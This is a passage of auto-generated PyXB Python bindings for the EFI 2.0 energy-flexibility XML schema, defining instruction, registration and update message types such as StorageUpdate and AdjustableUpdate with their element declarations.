Namespace.addCategoryObject('typeBinding', 'InflexibleUpdate', InflexibleUpdate)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_23 (Instruction):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 319 of
    InflexibleControllerEfi20.xsd.  Extends Instruction with a single
    locally declared element, curtailmentProfile, exposed as a Python
    property and registered in _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 319, 2)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = Instruction._ElementMap.copy()
    _AttributeMap = Instruction._AttributeMap.copy()
    # Base type is Instruction
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element instructionId ({http://www.flexiblepower.org/efi-2}instructionId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element isEmergencyInstruction ({http://www.flexiblepower.org/efi-2}isEmergencyInstruction) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element {http://www.flexiblepower.org/efi-2}curtailmentProfile uses Python identifier curtailmentProfile
    __curtailmentProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfile'), 'curtailmentProfile', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_23_httpwww_flexiblepower_orgefi_2curtailmentProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 323, 6), )
    curtailmentProfile = property(__curtailmentProfile.value, __curtailmentProfile.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared element; no new attributes.
    _ElementMap.update({
        __curtailmentProfile.name() : __curtailmentProfile
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_23 = CTD_ANON_23
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_24 (FlexibilityRegistration):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 341 of
    InflexibleControllerEfi20.xsd.  Extends FlexibilityRegistration with a
    single locally declared element, supportedCommodities, exposed as a
    Python property and registered in _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 341, 2)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = FlexibilityRegistration._ElementMap.copy()
    _AttributeMap = FlexibilityRegistration._AttributeMap.copy()
    # Base type is FlexibilityRegistration
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element instructionProcessingDelay ({http://www.flexiblepower.org/efi-2}instructionProcessingDelay) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element deviceDescription ({http://www.flexiblepower.org/efi-2}deviceDescription) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element currency ({http://www.flexiblepower.org/efi-2}currency) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element {http://www.flexiblepower.org/efi-2}supportedCommodities uses Python identifier supportedCommodities
    __supportedCommodities = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), 'supportedCommodities', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_24_httpwww_flexiblepower_orgefi_2supportedCommodities', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 345, 6), )
    supportedCommodities = property(__supportedCommodities.value, __supportedCommodities.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared element; no new attributes.
    _ElementMap.update({
        __supportedCommodities.name() : __supportedCommodities
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_24 = CTD_ANON_24
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_25 (FlexibilityUpdate):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 376 of
    InflexibleControllerEfi20.xsd.  Extends FlexibilityUpdate with two
    locally declared elements, endBefore and sequentialProfiles, each
    exposed as a Python property and registered in _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 376, 2)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = FlexibilityUpdate._ElementMap.copy()
    _AttributeMap = FlexibilityUpdate._AttributeMap.copy()
    # Base type is FlexibilityUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element {http://www.flexiblepower.org/efi-2}endBefore uses Python identifier endBefore
    __endBefore = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'endBefore'), 'endBefore', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_25_httpwww_flexiblepower_orgefi_2endBefore', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 380, 6), )
    endBefore = property(__endBefore.value, __endBefore.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}sequentialProfiles uses Python identifier sequentialProfiles
    __sequentialProfiles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfiles'), 'sequentialProfiles', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_25_httpwww_flexiblepower_orgefi_2sequentialProfiles', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 381, 6), )
    sequentialProfiles = property(__sequentialProfiles.value, __sequentialProfiles.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared elements; no new attributes.
    _ElementMap.update({
        __endBefore.name() : __endBefore,
        __sequentialProfiles.name() : __sequentialProfiles
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_25 = CTD_ANON_25
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_26 (Instruction):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 400 of
    InflexibleControllerEfi20.xsd.  Extends Instruction with a single
    locally declared element, sequentialProfileInstructions, exposed as a
    Python property and registered in _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 400, 2)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = Instruction._ElementMap.copy()
    _AttributeMap = Instruction._AttributeMap.copy()
    # Base type is Instruction
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element instructionId ({http://www.flexiblepower.org/efi-2}instructionId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element isEmergencyInstruction ({http://www.flexiblepower.org/efi-2}isEmergencyInstruction) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element {http://www.flexiblepower.org/efi-2}sequentialProfileInstructions uses Python identifier sequentialProfileInstructions
    __sequentialProfileInstructions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstructions'), 'sequentialProfileInstructions', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_26_httpwww_flexiblepower_orgefi_2sequentialProfileInstructions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 404, 6), )
    sequentialProfileInstructions = property(__sequentialProfileInstructions.value, __sequentialProfileInstructions.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared element; no new attributes.
    _ElementMap.update({
        __sequentialProfileInstructions.name() : __sequentialProfileInstructions
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_26 = CTD_ANON_26
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_27 (FlexibilityRegistration):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 411 of
    InflexibleControllerEfi20.xsd.  Extends FlexibilityRegistration with
    three locally declared elements — fillLevelLabel, fillLevelUnit and
    actuators — each exposed as a Python property and registered in
    _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 411, 2)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = FlexibilityRegistration._ElementMap.copy()
    _AttributeMap = FlexibilityRegistration._AttributeMap.copy()
    # Base type is FlexibilityRegistration
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element instructionProcessingDelay ({http://www.flexiblepower.org/efi-2}instructionProcessingDelay) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element deviceDescription ({http://www.flexiblepower.org/efi-2}deviceDescription) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element currency ({http://www.flexiblepower.org/efi-2}currency) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element {http://www.flexiblepower.org/efi-2}fillLevelLabel uses Python identifier fillLevelLabel
    __fillLevelLabel = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLabel'), 'fillLevelLabel', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_27_httpwww_flexiblepower_orgefi_2fillLevelLabel', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 415, 6), )
    fillLevelLabel = property(__fillLevelLabel.value, __fillLevelLabel.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}fillLevelUnit uses Python identifier fillLevelUnit
    __fillLevelUnit = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUnit'), 'fillLevelUnit', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_27_httpwww_flexiblepower_orgefi_2fillLevelUnit', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 416, 6), )
    fillLevelUnit = property(__fillLevelUnit.value, __fillLevelUnit.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}actuators uses Python identifier actuators
    __actuators = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuators'), 'actuators', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_27_httpwww_flexiblepower_orgefi_2actuators', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 417, 6), )
    actuators = property(__actuators.value, __actuators.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared elements; no new attributes.
    _ElementMap.update({
        __fillLevelLabel.name() : __fillLevelLabel,
        __fillLevelUnit.name() : __fillLevelUnit,
        __actuators.name() : __actuators
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_27 = CTD_ANON_27
# Complex type {http://www.flexiblepower.org/efi-2}StorageUpdate with content type ELEMENT_ONLY
class StorageUpdate (FlexibilityUpdate):
    """Complex type {http://www.flexiblepower.org/efi-2}StorageUpdate with content type ELEMENT_ONLY

    PyXB binding for the named complex type StorageUpdate
    (InflexibleControllerEfi20.xsd line 692), derived from
    FlexibilityUpdate.  Note _Abstract is True: the schema marks this type
    abstract, so instances are expected to be of a derived type.  No local
    elements or attributes are declared.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    # Abstract in the schema — only derived types appear in documents.
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageUpdate')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 692, 1)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = FlexibilityUpdate._ElementMap.copy()
    _AttributeMap = FlexibilityUpdate._AttributeMap.copy()
    # Base type is FlexibilityUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # No locally declared elements or attributes.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the binding both in the module and under its namespace-qualified name.
_module_typeBindings.StorageUpdate = StorageUpdate
Namespace.addCategoryObject('typeBinding', 'StorageUpdate', StorageUpdate)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_28 (Instruction):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 803 of
    InflexibleControllerEfi20.xsd.  Extends Instruction with a single
    locally declared element, actuatorInstructions, exposed as a Python
    property and registered in _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 803, 2)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = Instruction._ElementMap.copy()
    _AttributeMap = Instruction._AttributeMap.copy()
    # Base type is Instruction
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element instructionId ({http://www.flexiblepower.org/efi-2}instructionId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element isEmergencyInstruction ({http://www.flexiblepower.org/efi-2}isEmergencyInstruction) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element {http://www.flexiblepower.org/efi-2}actuatorInstructions uses Python identifier actuatorInstructions
    __actuatorInstructions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstructions'), 'actuatorInstructions', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_28_httpwww_flexiblepower_orgefi_2actuatorInstructions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 807, 6), )
    actuatorInstructions = property(__actuatorInstructions.value, __actuatorInstructions.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared element; no new attributes.
    _ElementMap.update({
        __actuatorInstructions.name() : __actuatorInstructions
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_28 = CTD_ANON_28
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_29 (FlexibilityRegistration):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 814 of
    InflexibleControllerEfi20.xsd.  Extends FlexibilityRegistration with a
    single locally declared element, supportedCommodities, exposed as a
    Python property and registered in _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 814, 2)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = FlexibilityRegistration._ElementMap.copy()
    _AttributeMap = FlexibilityRegistration._AttributeMap.copy()
    # Base type is FlexibilityRegistration
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element instructionProcessingDelay ({http://www.flexiblepower.org/efi-2}instructionProcessingDelay) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element deviceDescription ({http://www.flexiblepower.org/efi-2}deviceDescription) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element currency ({http://www.flexiblepower.org/efi-2}currency) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element {http://www.flexiblepower.org/efi-2}supportedCommodities uses Python identifier supportedCommodities
    __supportedCommodities = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), 'supportedCommodities', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_29_httpwww_flexiblepower_orgefi_2supportedCommodities', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 818, 6), )
    supportedCommodities = property(__supportedCommodities.value, __supportedCommodities.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared element; no new attributes.
    _ElementMap.update({
        __supportedCommodities.name() : __supportedCommodities
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_29 = CTD_ANON_29
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableUpdate with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): named complexType AdjustableUpdate.
# Adds no local elements or attributes; it exists as the common base for the
# anonymous AdjustableSystemDescription/AdjustableStatus types further below.
class AdjustableUpdate (FlexibilityUpdate):
    """Complex type {http://www.flexiblepower.org/efi-2}AdjustableUpdate with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableUpdate')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 891, 1)
    # Copy (not alias) the base maps so subclasses can extend them independently.
    _ElementMap = FlexibilityUpdate._ElementMap.copy()
    _AttributeMap = FlexibilityUpdate._AttributeMap.copy()
    # Base type is FlexibilityUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the binding class and expose the named type in the namespace category map.
_module_typeBindings.AdjustableUpdate = AdjustableUpdate
Namespace.addCategoryObject('typeBinding', 'AdjustableUpdate', AdjustableUpdate)
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): anonymous complexType that backs the
# AdjustableInstruction element; extends Instruction with runningModeId,
# runningModeFactor and startTime.
class CTD_ANON_30 (Instruction):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type in the schema, hence no expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 919, 2)
    # Copy (not alias) the base maps so local additions don't mutate the base type.
    _ElementMap = Instruction._ElementMap.copy()
    _AttributeMap = Instruction._AttributeMap.copy()
    # Base type is Instruction
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element instructionId ({http://www.flexiblepower.org/efi-2}instructionId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element isEmergencyInstruction ({http://www.flexiblepower.org/efi-2}isEmergencyInstruction) inherited from {http://www.flexiblepower.org/efi-2}Instruction
    # Element {http://www.flexiblepower.org/efi-2}runningModeId uses Python identifier runningModeId
    __runningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeId'), 'runningModeId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_30_httpwww_flexiblepower_orgefi_2runningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 923, 6), )
    runningModeId = property(__runningModeId.value, __runningModeId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}runningModeFactor uses Python identifier runningModeFactor
    __runningModeFactor = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), 'runningModeFactor', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_30_httpwww_flexiblepower_orgefi_2runningModeFactor', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 924, 6), )
    runningModeFactor = property(__runningModeFactor.value, __runningModeFactor.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}startTime uses Python identifier startTime
    __startTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'startTime'), 'startTime', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_30_httpwww_flexiblepower_orgefi_2startTime', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 932, 6), )
    startTime = property(__startTime.value, __startTime.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __runningModeId.name() : __runningModeId,
        __runningModeFactor.name() : __runningModeFactor,
        __startTime.name() : __startTime
    })
    _AttributeMap.update({
    })
# Register the binding class in the module's type-binding registry.
_module_typeBindings.CTD_ANON_30 = CTD_ANON_30
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): anonymous complexType that backs the
# InflexibleForecast element; extends InflexibleUpdate with forecastProfiles.
class CTD_ANON_31 (InflexibleUpdate):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type in the schema, hence no expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 281, 2)
    # Copy (not alias) the base maps so local additions don't mutate the base type.
    _ElementMap = InflexibleUpdate._ElementMap.copy()
    _AttributeMap = InflexibleUpdate._AttributeMap.copy()
    # Base type is InflexibleUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element {http://www.flexiblepower.org/efi-2}forecastProfiles uses Python identifier forecastProfiles
    __forecastProfiles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'forecastProfiles'), 'forecastProfiles', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_31_httpwww_flexiblepower_orgefi_2forecastProfiles', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 285, 6), )
    forecastProfiles = property(__forecastProfiles.value, __forecastProfiles.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __forecastProfiles.name() : __forecastProfiles
    })
    _AttributeMap.update({
    })
# Register the binding class in the module's type-binding registry.
_module_typeBindings.CTD_ANON_31 = CTD_ANON_31
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): anonymous complexType that backs the
# InflexibleCurtailmentOptions element; extends InflexibleUpdate with curtailmentOptions.
class CTD_ANON_32 (InflexibleUpdate):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type in the schema, hence no expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 308, 2)
    # Copy (not alias) the base maps so local additions don't mutate the base type.
    _ElementMap = InflexibleUpdate._ElementMap.copy()
    _AttributeMap = InflexibleUpdate._AttributeMap.copy()
    # Base type is InflexibleUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element {http://www.flexiblepower.org/efi-2}curtailmentOptions uses Python identifier curtailmentOptions
    __curtailmentOptions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOptions'), 'curtailmentOptions', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_32_httpwww_flexiblepower_orgefi_2curtailmentOptions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 312, 6), )
    curtailmentOptions = property(__curtailmentOptions.value, __curtailmentOptions.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __curtailmentOptions.name() : __curtailmentOptions
    })
    _AttributeMap.update({
    })
# Register the binding class in the module's type-binding registry.
_module_typeBindings.CTD_ANON_32 = CTD_ANON_32
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): anonymous complexType that backs the
# StorageSystemDescription element; extends StorageUpdate with actuatorBehaviours
# and leakageBehaviour.
class CTD_ANON_33 (StorageUpdate):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type in the schema, hence no expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 681, 2)
    # Copy (not alias) the base maps so local additions don't mutate the base type.
    _ElementMap = StorageUpdate._ElementMap.copy()
    _AttributeMap = StorageUpdate._AttributeMap.copy()
    # Base type is StorageUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element {http://www.flexiblepower.org/efi-2}actuatorBehaviours uses Python identifier actuatorBehaviours
